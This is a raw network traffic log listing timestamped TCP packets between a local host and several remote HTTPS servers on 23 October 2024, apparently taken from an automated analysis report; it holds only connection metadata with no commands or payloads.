                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.645035982 CEST44349855141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.645390034 CEST49855443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.645462036 CEST44349855141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.646898031 CEST44349855141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.646972895 CEST49855443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.647350073 CEST49855443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.647437096 CEST44349855141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.647505999 CEST49855443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.647521973 CEST44349855141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.650229931 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.674092054 CEST44349851141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.674166918 CEST44349851141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.674199104 CEST44349851141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.674207926 CEST49851443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.674217939 CEST44349851141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.674252987 CEST49851443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.674287081 CEST44349851141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.674340010 CEST44349851141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.674367905 CEST44349851141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.674387932 CEST49851443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.674393892 CEST44349851141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.674437046 CEST49851443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.675153971 CEST44349851141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.676059961 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.676085949 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.676127911 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.676152945 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.676192045 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.676192045 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.676202059 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.676309109 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.685523033 CEST44349852141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.685560942 CEST44349852141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.685585022 CEST44349852141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.685611963 CEST44349852141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.685612917 CEST49852443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.685643911 CEST44349852141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.685679913 CEST49852443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.685697079 CEST44349852141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.685731888 CEST44349852141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.685754061 CEST49852443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.685767889 CEST44349852141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.685826063 CEST49852443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.685837984 CEST44349852141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.685863018 CEST44349852141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.685920000 CEST49852443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.687062979 CEST49852443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.687092066 CEST44349852141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.690808058 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.690859079 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.690943003 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.691154003 CEST49867443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.691227913 CEST44349867141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.691292048 CEST49867443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.691355944 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.691385031 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.691406965 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.691497087 CEST49867443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.691514015 CEST44349867141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.691550970 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.691608906 CEST49853443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.691623926 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.691723108 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.691778898 CEST49853443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.691787004 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.691885948 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.691970110 CEST49853443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.691975117 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.692003012 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.692078114 CEST49853443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.694653034 CEST49855443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.696494102 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.697761059 CEST44349854141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.697805882 CEST44349854141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.697835922 CEST44349854141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.697855949 CEST49854443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.697875023 CEST44349854141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.697911978 CEST44349854141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.697922945 CEST49854443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.697935104 CEST44349854141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.697987080 CEST49854443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.697988987 CEST44349854141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.698038101 CEST49854443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.698924065 CEST49854443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.698939085 CEST44349854141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.701337099 CEST49868443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.701364994 CEST44349868141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.701420069 CEST49868443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.701721907 CEST49868443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.701736927 CEST44349868141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.701903105 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.702156067 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.702167034 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.702527046 CEST49869443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.702569962 CEST44349869141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.702651978 CEST49869443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.702858925 CEST49869443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.702888012 CEST44349869141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.703197002 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.703259945 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.703737974 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.703819990 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.703879118 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.703885078 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.706540108 CEST44349857141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.707026005 CEST49857443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.707036018 CEST44349857141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.710537910 CEST44349857141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.710627079 CEST49857443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.710916996 CEST49857443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.711035967 CEST49857443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.711041927 CEST44349857141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.711086988 CEST44349857141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.717550993 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.717571974 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.717654943 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.717665911 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.717756987 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.725121975 CEST49851443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.725131035 CEST44349851141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.740288973 CEST49853443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.755650997 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.755819082 CEST49857443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.755829096 CEST44349857141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.771704912 CEST49851443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.788985014 CEST44349855141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.789062023 CEST44349855141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.789108038 CEST49855443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.789117098 CEST44349855141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.789175987 CEST44349855141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.789216042 CEST49855443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.789222956 CEST44349855141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.789275885 CEST44349855141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.789316893 CEST49855443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.789323092 CEST44349855141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.789375067 CEST44349855141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.789417028 CEST49855443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.789424896 CEST44349855141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.793021917 CEST44349851141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.793138027 CEST44349851141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.793180943 CEST49851443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.793184042 CEST44349851141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.793195963 CEST44349851141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.793246984 CEST49851443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.793252945 CEST44349851141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.793411970 CEST44349851141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.793452978 CEST49851443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.793458939 CEST44349851141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.794287920 CEST44349851141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.794327974 CEST44349851141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.794337988 CEST49851443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.794343948 CEST44349851141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.794385910 CEST49851443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.794390917 CEST44349851141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.794559002 CEST44349851141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.794608116 CEST49851443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.794743061 CEST44349855141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.794797897 CEST49855443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.794806004 CEST44349855141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.795310974 CEST44349855141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.795393944 CEST49855443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.795428991 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.795460939 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.795527935 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.795527935 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.795542955 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.795600891 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.796099901 CEST49851443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.796109915 CEST44349851141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.797475100 CEST49855443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.797483921 CEST44349855141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.800498009 CEST49871443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.800538063 CEST44349871141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.800645113 CEST49871443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.801130056 CEST49871443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.801146984 CEST44349871141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.802880049 CEST49872443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.802925110 CEST44349872141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.802953005 CEST49857443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.802994013 CEST49872443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.803405046 CEST49873443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.803421974 CEST44349873141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.803482056 CEST49873443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.803602934 CEST49872443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.803622961 CEST44349872141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.803809881 CEST49873443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.803819895 CEST44349873141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.816852093 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.817049026 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.817131996 CEST49853443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.817152023 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.817181110 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.817331076 CEST49853443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.817332029 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.817356110 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.817406893 CEST49853443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.817440987 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.817583084 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.817646027 CEST49853443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.817657948 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.817750931 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.817887068 CEST49853443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.817894936 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.835716963 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.835778952 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.835803986 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.835825920 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.835845947 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.835894108 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.837433100 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.837455034 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.837518930 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.837527990 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.837656021 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.852250099 CEST44349857141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.852257013 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.852361917 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.852391005 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.852401018 CEST44349857141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.852420092 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.852418900 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.852436066 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.852452993 CEST49857443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.852458954 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.852463007 CEST44349857141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.852472067 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.852493048 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.852511883 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.852511883 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.852520943 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.852539062 CEST44349857141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.852550030 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.852587938 CEST49857443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.852596045 CEST44349857141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.852705956 CEST44349857141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.852768898 CEST49857443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.852777958 CEST44349857141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.852868080 CEST44349857141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.852907896 CEST49857443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.852915049 CEST44349857141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.853005886 CEST44349857141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.853053093 CEST49857443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.853060007 CEST44349857141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.853276014 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.853316069 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.853322983 CEST44349856141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.866389990 CEST49853443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.883830070 CEST44349741142.250.186.68192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.883905888 CEST44349741142.250.186.68192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.883972883 CEST49741443192.168.2.6142.250.186.68
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.896776915 CEST49856443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.896832943 CEST49857443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.914191008 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.914211035 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.914288044 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.914298058 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.914340019 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.935775042 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.935981035 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.936052084 CEST49853443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.936064959 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.936166048 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.936260939 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.936301947 CEST49853443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.936310053 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.936387062 CEST49853443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.936393023 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.936485052 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.936593056 CEST49853443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.936599016 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.936991930 CEST44349853141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:11.937078953 CEST49853443192.168.2.6141.193.213.11
